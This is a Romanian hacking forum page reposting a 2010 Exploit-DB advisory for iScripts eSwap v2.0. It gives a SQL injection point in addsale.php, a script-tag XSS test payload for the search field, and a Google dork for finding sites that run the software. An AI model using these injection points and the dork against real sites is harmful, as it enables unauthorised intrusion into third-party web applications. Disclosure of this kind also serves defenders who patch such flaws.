EliteHackers
SALUT 2022!! NE-AM MUTAT PE DISCORD ! Vrei să inviți un prieten? [T]eoria [H]aosului [C]ontrolat - https://discord.com/invite/U4HBCHzm7r Acesta aste link-ul oficial al acestui server.
Lista Forumurilor Pe Tematici
EliteHackers | Reguli | Inregistrare | Login

POZE ELITEHACKERS

Nu sunteti logat.
Nou pe simpatie:
barbyDana pe Simpatie
Femeie
25 ani
Bacau
cauta Barbat
28 - 46 ani
EliteHackers / Exploituri / iScripts eSwap v2.0 sqli and xss vulnerability Moderat de Ad_Infinitum, AntiKiler, Puscas_marin, r3v
Autor
Mesaj Pagini: 1
r3v
Moderator

Inregistrat: acum 16 ani
Postari: 1158


Code:

# EDB-ID: 13740
# CVE: ()
# OSVDB-ID: ()
# Author: Sid3^effects
# Published: 2010-06-06
# Verified: No
# Download: Exploit Code
# Download: N/A view source

print
?# Title:iScripts eSwap v2.0 sqli and xss vulnerability 
# Author: Sid3^effects  
# Published: 2010-06-05   
# price:$99.95 
# email:   
# vendor: iScripts 
# url : http://www.iscripts.com/eswap/ 
# google dork : Powered by iScripts eSwap.    
  
############################################################################ 
  
        ooooo  .oooooo.  oooooo   oooooo     oooo   
  
        `888' d8P'  `Y8b  `888.    `888.     .8'   
  
         888 888           `888.   .8888.   .8'   
  
         888 888            `888  .8'`888. .8'   
  
         888 888             `888.8'  `888.8'    
  
         888 `88b    ooo      `888'    `888'   
  
        o888o `Y8bood8P'       `8'      `8'      
  
                                             
--------------------------------------------------------------------------------------   
  
#####################Sid3^effects aKa HaRi##################################   
  
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]   
  
#Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR   
  
#ShouTZ:kedar,dec0d3r,41.w4r10r 
  
#spl shoutz:LiquidWorm,gunslinger_ :D        
  
#Catch us at www.andhrahackers.com or www.teamicw.in   
  
############################################################################   
Description :  
   
iScripts eSwap enables you to create an virtual swapmeet site in minutes. End users can list items for swap, sell or buy. Let end users to swap unwanted items for things they want! Users can add items for sale or swap. They can also add their wish list for trading items. eSwap lets you charge users a fee for listing, featured listing and optional escrow service. Credit card payments through Authorize.net , Paypal, 2checkout and Google checkout are supported. Also offline payment methods are supported. The powerful admin section allows you to have multiple categories, sub categories and control every aspects of the business. This exchange platform is the ultimate green business by helping your users to recycle 
############################################################################   
  
Sql injection and XSS is found in the eswap script V2.0 
  
Xploit :\m/  sqli \m/ 
  
  
   demo : http://[site]/eswap/demo/addsale.php?type=[Sqli] 
  
Xploit: \m/ Xss \m/ 
    
      XSS is found in search field :D 
                  
   Attack pattern : '"--><script>alert(0x000872)</script> 
  
   demo :http://[site]/eswap/demo/search.php 
            
############################################################################   
  
#Sid3^effects



_______________________________________
http://thieves-team.com
r3vyk.info
mess id: doar prin PM datorita faptului ca mi-au dat add 10000 de retardati care joaca metin

pus acum 16 ani
   
Pagini: 1  

Mergi la